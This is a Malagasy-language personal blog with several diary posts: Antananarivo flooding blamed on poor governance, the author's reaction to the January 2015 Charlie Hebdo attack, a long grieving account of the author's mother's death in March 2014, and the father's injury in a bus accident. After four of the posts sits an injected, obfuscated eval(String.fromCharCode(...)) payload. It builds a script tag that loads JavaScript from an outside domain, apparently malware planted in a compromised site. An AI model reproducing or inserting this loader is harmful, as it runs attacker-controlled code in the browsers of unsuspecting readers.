Tsy hita ny hambara fa dibo-drano Antananarivo, mihotsaka ny tany etsy sy eroa. Ankoatran’ny hoe fanamboaran-trano kitoatoa tsy nahazahoan-dalana dia eo ihany koa fahaiza mitantan’ny fanjakana no tena nahatonga izao, raha mba efa nandray fepetra hatramin’ny taloha nisian’ny tondra-drano t@ taona 1950 tany ho any mantsy ry zareo ngamba dia tsy ho voa mafy tahaka izao ny vahoaka madinika fa indrisy ny famenoam-posy hatrany ho an’ireo izay nifandimby teo no betsaka ka dia izao no vokany, tsy nisy nijery izany plan d’urbanisation sns izany fa samy nanao izay saim-patany ny rehetra na ny mpanamboatra trano izany na ny mpanome fahazahoan-dalana ihany koa, na ireo mpanototra tanim-bary na ireo mpanary fako etsy sy eroa kaa mameno ny tatatra izay tsy misy mpikarakara intsony…..

Iza no tena diso? ny vahoaka avela hikarakara tena irery sa ny fitondrana avela hameno posy irery??,eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


No comments

Charlie/Malagasy aho……

Ela no tsy nanoratako, efa tsy haiko intsony angamba fa variana loatra atsy ambadika atsy aho ggrr,

 

Tsy mba naneno ny hevitro teto aho mantsy tà hotakotaka niseho taty Frantsa, tany onenako sy mandray aho t@ zava-nitranga ny 07/01/2015 teo ireny, onena tokoa aho, satria dia resaka politika, resaka an-tsary no dia amonona olona, andatsahan-drà tahaka izao, tsy hiditra lalina aho satria efa betsaka ny voasoratra t@ izay andro sy fotoana izay.

Ireo mpanao kisarisary mpanao gazety ireo tokoa mantsy no lasibatry ny ‘terroristes’ nefa dia maro ny namoy ny ainy tao anatin’izany… Maro ny hetsika naneran-tany niseho nanoherana izany toe-draharaha izany, nisy moa ny niteny hoe voakitika kely ny frantsay dia ny vahoaka ambany lanitra rehetra no miaraka mientana, ENY marina izany satria efa samngy mihoatran’ny loha no miseho satria dia voantohintohina ny fampahalalam-baovao, ny fanehoan-kevitra, nahoana tokoa moa raha toa ka tsy mitovy ny hevitra ka rà mandriaka no miseho?? betsaka ny tranga tahaka izany ety an-tany, nefa dia ny teto Frantsa ihany no nisy fiaraha-mientan’izao tontolo izao, satria ngamba hoe firenena matsanjaka izy…….Tonga taty daholo nilahatra an-dalam-be ny lehibe na ny mpisolo-tenan’ny firenen-dehibe nahatsapa tena fa tsy mety ny famoretana na ny fanam-penam-bava ny fampahalala-baovao…. nefa anie dia maro amin’ireo tonga teo ireo no tsy mamela akory ny fampahalalam-baovaondry zareo hampita malalaka izany any amin’ny taniny e!…. ppff mpitari-baato vilam-bava ihany izany amiko…. fisehosehoana ivelany ihany koa…. nefa moa ho afaka ny hanao inona isika…. efa rano indray mitete tao anatin’ny ranomasim-be aloha iny fiaraha mientana iny… efa dian-tongotra inndray dingana aloha iny vita iny…. enga anie tsy hisy intsony ny manaraka……izany hoe ny tiako hambara, tsy hisy intsony ny sahotaka….

Tsy hanoratra lava aho fa tsy hahita hambara amin’io akory moa…….eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


No comments

Fikarakarana ny dianay!

Tsy haiko hoe atomboka aiza izy ity fa dia atomboka fotsiny aloha, efa nambarako ihany koa fa ‘diary izy ity aary Diary mipetraka indrindra ho an’ny zanako’. Mba ho vakiany any aoriana any sy ho tsiahiviny ihany koa………..

Vao maraina ihany koa aza ny alatsinain’ny 17/03/2014 dia naneno ny findaiko, sahalan’ny nanonofy ihany aho no somary taitra ihany koa satria tena tampoka be fa tena vao tokony ho tamin’ny 6h35 teo ho eo  ny ora, niarina aho nipetraka no naheno an’i Nanick somary nitomany sady niantsoantso ny anarako, taaitra aho sady nampanginiko aloha izy, noheveriko fa misy tsy salama ny zanany aloha ka hoy aho hoe fa misy inona? salama tsara veh ianareo ao? manao ahoana izy dahy? henoko mantsy talohan’io fa tsy salama i Elodie fa folaka ny tongony ka izy irery no nandeha tany à hopitaly sy nitady farmasia nivoha alina, ka noheverika fa nila ahy izy ary nanontany azy aho fa misy inona no mitomany izy, dia sady mitomany izy no miteny hoe i mamanareooo, no averimberiny, avy eo aho miezaka mamantatra hoe ahoana?? niditra hopitaly veh? annn ann ann hoy izy tena tsy takaatry ny saiko ny zavatra nolazainy ahy, farany dia nolazainy fa maty i mamanareo, teo aho vao tafapetraka satria somary saika nitsangana aho sao manaitra an’i José mbola matory ny resakay, tsy nahateny segondra vitsy aho aloha. Ny voalohan’ny zavatra nataoko dia ny namelona ny solosaina aloha, vao nitsangana aho, tsy niteny t@i José akory aho fa tonga aho dia nitsangana nandeha tany an’efitra aloha, ary notapahiko ny resakay sy i Nanika, teo aho vao nalemy ny lohaliko nahita ny Facebook tsy nisy na inona na inona, tampoka teo koa moa hitako ny ‘post’ nalefan’ny zandriko Ilaidama milaza amiko hoe ‘Ilazao ny fianakaviana sy ny havana any fa maty i neny’ niverina haingana tany am-pandriana aho sao ho fanina irery tao an’efitra tao sady niteny ny zava-misy t@ i José, nitsangana ihany koa izy, nankahery ahy dia lasa nanamboatra sakafo marainanay………………. Avy teo aho vao nilaza teo @ FB ny zava-nisy……………………….

Niezaka niantso ny tany an-tanàna aho ary dia nahazo an’i Faly ngamba raha tsy diso aho izy dia “iehhhh lasa izany izy e!!!’ hoy ny navaliny ahy sa moa i Dama no azoko tsy tsaroako intsony, dia hiantso ny olona aty aho izany hoy aho dia mamerina miantso avy eo.

Nijanona kely tao an’efitra fatoriana aloha aho nivavaka mangiana nalahelo sady somary tezitra t@ Tompo ihany koa hoe NAHOANA? no dia nompatra tahaka izao ny fiainanay??? tsy izy no tokony hiala ity tany ity voalohany tsy izy mihintsy nefa dia izay moa no lahatra sy efa vosoratra ihany koa angamba, vita izay dia nijery an’i Maeva aho niteny azy ny zava-misy, taitra tokoa izy, sady nigogogogo nitomany, efa henony ihany aho misomebiseby fa tsy nihetsika tao am-pandriany izy hono…… efa t@ 7h00 tany ho any aho vao niantso an’i tatie Farasoa aloha tsy nampoiziny ny antsoko, vao naheno ny feoko izy dia hoy izy hoe:”allo zoky, joyeux anniversaire zoky” miaraka à feony annn, dia izaho mitomany dia oayyeeee hoy izy fa maninona anie no mitomany i zoky e!!!! dia hoy aho hoe nenifara aa nenifara ann lasa i neny dia hoy izy hoe lasa ahoana, maty neny hoaaaa, dia taitra be ihany koa izy … fa ahoana annnnnn hoy izyyy, izay ny téléphone vao azoko vao teo hoy aho, samy nangina izahay mianaka dia hoy aho hoe avelako ianao fa hiantso ny hafa aho aloha…. dia niantso an’i tatie Zoany indray aho dia hoy aho mantsy azy hoe lasa i neny ry toutou ann dia hoy izy hoe ééé efa azoko an-tsaina ihany anaaka fa dia mahereza annn, dia somary nihato kely aho aloha vao niantso an’i Hoby zandriko satria tena tsy ho haiko ny hilaza aminy hoy aho nefa dia tsy maintsy ho izaho ihany ny hilaza aminy. Nony niantso an’i Hoby aho dia mbola anaty torimaso ihany koa moa izy dia taitra aoka izany izy, nony nilazako ny vaovao ratsy, fa ahoana izany?? izany foana no naverimberiny……. dia ahoana izany????….. izany ihany ny nolazainy……..rehefa avy nanomana an’i Maeva handeha hianatra moa aho dia i José no nanatitra azy. Izaho koa avy teo moa dia nampandre ny tany am-piasana ………………………..Nandalo ihany koa i Nanick nijery anay alohan’ny handehanany hiasa

Vao lasa kely ry zareo dia efa nanomboka tonga tao an-trano ny namana eto Lille ny mpianatra sy ny mpiara mivavaka ao @ fiangonana katolika, mbola pyjama aho à izany fa dia nahafinaritra fa dia tena hoe tsy irery aho fa dia trano iray ihany izahay rehetra aty ireo. Tena hoe voin-kava mahatratra tokoa, tao ny nampirina ny trano tao ny nikarakara entana tao ny tsy haiko intsony fa tena tsy irery aho nandritra ireny fotoana ireny nisy an’ireo namana/havana ireo.

Tsy nisy fisalasalana ihany koa moa fa dia tsy maintsy hoe hitady billet maika dia maika izany, efa nijery ihany i José alohan’ny handehanany hiasa maraina, fa naleoko ihany niantso an’i Hélène vadin’i Arnaud mpiara miasa aminay izay miasa ao @ Voyage Mariot fa ananako fahatokisana kokoa toy izay hijery billet @ internet. Ry nenifara sy nenitoa isany ary Hoby ihany koa dia nanao fifidianana billet mitambatra ho azy 4 mianaka, izany hoe 6 miafy izahay no niainga taty Frantsa ny Talata 18/03/2014. Mbola nandeha niaraka tà i Ninie ihany aloha tany à agence hafa nampitaha vidin’ny billet, ny talata dia i Nanick no nanatitra anay teny à Bus izay namoa-tsampona ihany koa satria tsy maintsy nivily lalana satria nisy manifestation io andro io teto Lille, izaho anefa tsy maintsy mbola nankany am-piasana naka ny billets-nay mianaka satria tsy misy imprimante ao an-trano re grrrrrrrr

Ny alatsinainy hariva no feno olona nandalo tao an-trano, ny mpiara mivavaka ao à FPMA izay notarihan’i Pasteure Miora ary teo ihany koa ny namana aman-tsakaiza teto Lille, tonga taty moa i Mme Tiana sy ny zanany, ary tonga tao an-trano ihany koa i Brigitte sy ry Dolly mivady,

Izahay mianaka moa miainga avy aty Lille dia nandeha IDBUS ka nanondrana koa ity izy fa navilin’ny douane lalana ary dia nasaina nidina daholo ny mpandeha tao anatiny sy ny entana ary satria ny entanay mianaka no lehibe indrindra tao dia nasain’ilaay polisy natokana ary navoaka ny aliaka nioroka azy teo, sady sorena aho no niteny ilay polisy anankiray hoe handeha handevina ny reniko anie izahay fa tsy hilalao akory e! dia novaliany hoe tsy misy atahoranao ny à izay atao eto akory raha izany kann, tsy tiako ny entako kasihin’ny aliaka hoy aho…. sady nangarihako ilay polisy ggrrrrr , efa nisy fotoana very izany aloha ny anay teny an-dalana fa tsy natahotra ny ho tara aloha izahay satria niala maraina izahay ary ny hariva anefa ny fiara manidina vao miala.

Tonga teny Orly ary dia nisy ny fianakaviana teny ary nisy ihany koa ny namana teny, i Harybe, Rakaroka ary i Mama Ida, nitondra ny teny fampiononana izy telo mirahavavy ka tena nampahery tokoa, ireny namako ireny moa na tsy mifanerasera vatana isan’andro aza dia mifanerasera virtoaly isan’tsegondra kosa ato anatin’ny foko, maro izy ireny, ary dia tena namana tokoa, na @ andro sarotra na à andro an-kafaliana, fa dia miaraka misary gaigy eny izahay mirahavavy sy mianadahy avy………….

Mazava ho azy moa fa tsy maintsy hoe niandry an’i Hoby izay tara lava ny mpianakavy vao nanao ny fombafomba atao alohan’ny fiondranana, izahay no fara olona nanao izany………… fa nony tonga tao anatin’ny tao ihany koa anefa dia mbola tantara hafa ihany koa satria nisy fahasimbany ny fiara manidina ka dia niantsona ela tao aloha ny mpandeha nasaina niova toerana izahay aloha, dia nomena sakafo aloha fa tena ho alina vao hiainga, fa dia niainga ihany rehefa nisy fahatarany efa ho adiny 4 sa mihoatra akory aza………

Nony tonga tany Ivato dia i dadatoa Pasy no nitsena anay tao anatiny ary nomena azy ny passeport rehetra ary ny mpanampy azy no nisahana ny tokony natao rehetra tany, izaho moa tsy nahahetsika intsony fa dia nalemy ny lohaliko, no nitantara taminy aho hoe tsy tokony nandeha izy fa tsy hitany akory anie izao ilay sary nandrasany sns e!!!! nampionona ahy moa izy hoe efa izay no nalahatry ny Tompo ho antsika ka dia mahaiza mionona, ………..

Rehefa tonga tao an-trano dia mbola niandry kely teo an-tokontany izahay fa mbola nisy olona namangy tao an-trano i tatie Zéline no namoha ny fiara, sy niantsampazako voalohany, ny hafa tena tsy tsaroako hoe iza avy ny teo, avy teo aho vao nandeha teo à i neny e!!!!! ny hany teny tsaroako naloaky ny vavako dia hoe ‘tsy tokony mbola nandeha anie i neny e!!! tsy tokony mbola nandeha’…..hitako i dada nitsangana avy teo vao niala teo aho satria niandry koa i Hoby teo akaikiko, “aoka izay” hoy i dada “fa efa lasa izy ka atao ahoana aza” dia nangiana aho tsy tsaroako hoe latsa-dranomaso be aho fa nofokofoko kely fotsiny dia namonjy seza aloha, dia tonga koa i Hoby nipetraka teo akaikiko, dia i Maeva, ……………………eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


No comments

Lasa i Neny e!

Lasa i Neny!

 

Kepoka tsy mahita hambara aho, lasa ilay kibo nitoerana, ilay nandatsaka an-tany, ilay nampianatra nandeha, ilay nitarainana, ilay nanambitamby, ilay nihantahantana, ilay nibedibedy, ilay nasiaka ihany koa matetika, ilay tsy nanam-paharoa; ilay tsy azoko soloina akory……. lasa izy, namela anay zanany aman-jafiny ary i dada, mbola hiady @ ity fiainana ity!

Iza intsony no hitantara amiko ny zavatra miseho rehetra ao @ fianakaviana izao? iza no hampahafantatra ahy ny zava misy any an-toerana sns izao?? very aho ry neny lasa ianao tsy misy hahasolo ny toeranao…..

Andro tsy mbola tokony handehanany akory no nandehanany nefa moa dia izay no andro tian’Izy Tompo nangalana azy ho any aminy ka dia nalainy mba ho any Aminy indray izy fa noheveriny fa efa vita ny adidiny aminay ety.

Vao tsy ela anefa izy no niverina avy tany Antsirabe avy nanao cure, ary dia afaka nandeha soa aman-tsara indray na dia somary ataontsika hoe somary mbola miadana sy mila fanampiana ihany aza matetika, ny tosi-drà ny no efa somary nihatsara ihany koa niverina avy tany ilay somary niakatra ambony be teo, efa niverina nihatsara ihany koa izy iny tàizy ilay nihotra tany Tsimbazaza t@ tany @ ndry Fara be iny fa nohon’ny fitaintainany lava dia miaka-midina eo ihany ny tosi-dràny. Tany @ ndry Lanto moa izy sy i Raelina no nipetraka nandritran’ny roa ambiroampolo andro naharetan’ny fitsaboana azy tany, naharitra ihany ny fitsaboana ary dia izay nahitana rirany kely izay, ary tokony hoe niverina indray izy mianaka ny volana Mai, nefa dia indrisy, izay ny fandaharana.

Ny herinandro mialohan’ny niambohany dia izay olona tonga nitsidika azy ka nahita azy anefa dia nahatsikaritra azy ho miran’endrika sy sariaka aoka izany, ary dia nanafatrafatra izy ny hifankatiavan’ny samy mbola velon’aina ihany koa, fa tsy ho fantatra izay ho avoakan’ny ampitso, ary ny oroka nataony dia oroka mamihina tahakan’ny “hoe tsy avelako ianao fa tiako sady mamiko tokoa!”

Roa andro talohan’ny nahalasanany moa ny tsingerin-taona nahaterahako, tsy afaka niresaka t@ sofin-davitra na Skype akory izahay fa dia teo à mailaka sy Facebook no nifampiarahaba kely sy nifanao ‘coucou’ dia vita fa tsy nisy fotoana firy aho ny 15/03/14 fa niasa ary ny 16/03 izy no nitenenako hoe androany izahay vao miaraka misakafo fa tsy miasa aho nefa koa sady mitondra ny tanora manao fanazarana hira ho @ fety izay karakarain’ny fiangonana katolika eto Lille,  dia eny hoy izy fa miandry ny sarin’ny mofomaminao tahakan’ny mahazatra ihany aho izany, kinanjooooooooo, efa tara loatra ny alin’ny 16/03 dia tsy nahavita nandefa sary intsony aho, izy koa kay tany an-tanàna efa somary tsy dia salama ihany fa dia avy nisakafo izy sy idada ny hariva dia niakatra toy ny fanaony i dada nanohy ny bokiny, moa i neny mbola nijery ny fahitalavitra tao an-dakozia, kelikely taorian’izay, dia niantso an’i dada izy fa tsy vitany intsony ny mamindra hatrany @ WC fa mila fanampiana izy, dia tonga i dada namonjy azy, akory anefa ny fahatairany fa olona efa eo @ tolanam-baravarana eo an-dalatsara no hitany mila hitambotsitra @ tany, no injay nakany seza haingana mba hipetrahany, teo izy vao niantso fanampiana tany @ i Raelina, andro tokony ho t@ 7 ora hariva mahery tany ho any izay.

Rehefa vita izay dia naharitra adiny iray mahery izy mianaka vao tafiakatra tany am-pandriana, tena vizana i neny izany e! Ny alina kosa dia sahirana izy sy i dada raha ho any à WC izy satria dia nila ho antsasakadiny mandeha ary tahaka izay ihany koa miverina nefa dia in dimy mandingana fotsiny dia tonga. Tokony ho @ iraika amin’ny folo tany ho any dia hoy i neny hoe ndao antsoina i Pasy fa tsy azoko ny aiko izany, dia novalian’i dada izy hoe tsy hisy olona ho avy à izao ora izao fa aza manahy ianao faa dokotera roa no ho entiko aminao eto rahampitso maraina koa, satria tokoa mantsy dia nisy fahoriana koa tao àfianakaviana ka nifamontoana izy efatra mirahalahy ny maraina fa hamangy any.

Ny maraina tokony ho t@ efatra sy sasany aloha kelin’ny ora fifohazany mahazatra dia nitsangana izy ho eo à solosaina tahakan’ny fanaony, ary dia ohatran’ny nitaraina ho fanina angamba hoy i dada fa dia nanara-drindrina izy tà izany, nefa dia tongany ihany teny à seza ary dia teny izy no nianjera, novonjen’i dada nefa dia indrisy…….niantso ny dokotera rahalahiny i dada nanazava ny toe-javatra, ary dia naniraka ny ambulansy izy ho avy haingana, nefa efa tara loatra izany,

I tonton Jean Bà no tonga voalohany tao an-trano satria tonga dia nasain’i tonton Patou nivily izy satria izy no akaiky avy any Mahitsy tsinona, dia avy dia hitany fa tsy ao intsony i neny, ary niteny t@ i dada izy hoe amboary ny saina fa i dada no tsy dia mbola nety loatra ary dia niteny taminy hoe ny ntaolo dia nila fitaratra ary natao teo akaikin’ny vava orona ary dia natao izany, nilaza ihany koa i dada fa raha nokasihiny ny faladian’i neny dia tsy nisy famaliana intsony avy taminy tahakan’i” mama” i bébé Tiana izany izay renin’izy ireo, efa nampahery azy ihany moa i tonton Jean Bà, fa dia naleony niandry ny fahatongavan’ny ambulansy ihany, tonga anefa ireto farany niaraka t@ i tonton Pasy ary tsy nisy afaka natao intsony afatsy ny famenoana ny taratasy nandehanany sisa………… izay ny lahatry ny Avo, manaiky izahay Tompo ô!

 

Izay aloha ny @ iny fa ho tohizako manaraka indray ny fizotry ny fandaharam-potoana tà izay andro izay

Lasa ny 17 Martsa 2014 i Neny Bodo RAJAONARISON

teraka RANDRIAMIHOATRA Rabodosoamanalina  teraka ny 19 Oktobra 1949

 

 

 eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


34 comments

Tratry ny taona 2014

[yframe url=’http://www.youtube.com/watch?v=TX5wZBRmRZs’]Tonga indray ity ny taona 2014, taona vao² taona feno fifaliana ihany koa.

Fa taona saika nanomboka t@ loza izay saika nanjo an’i dada raha nandray fiara fitateram-bahoaka izy, satria dia ny 08/01/2014 dia nieren-doza izy. Isaorana an’Andriamanitra lehibe tokoa izany. Nipetraka tao anaty fiara izy ary teo akaikin’ny fitaratra ety @ sisiny, ary rehefa nijanona iny ny fiara be ka ilay mifanesika maka ny entany eo ambony tafo ny olona dia vaky ny fitaratra ary vaky teo @ tarehin’i dada tsy alavitry ny masony ary teo @ tendany ihany koa, izay tsy dia alavitra ny carotide  izay teo @ ho sahabo ho 2cm miala teo (tena saika ratsy be). Ilay namaky fitaratra moa dia tsy hita fa dia rifatra nandositra ka dia ny mpamily sy ny mpanampy azy no nitondra an’i Dada tany à toeram-pitsaboana tsy alavitra teo ary dia nahazo fitsaboaha haingana izy. Ry zareo rahateo ihany koa no niantoka ny rehetra ary nanatitra an’i dada tany an-trano nony vita izany rehetra izany, tsy nametraka fitoriana moa i dada …………………..

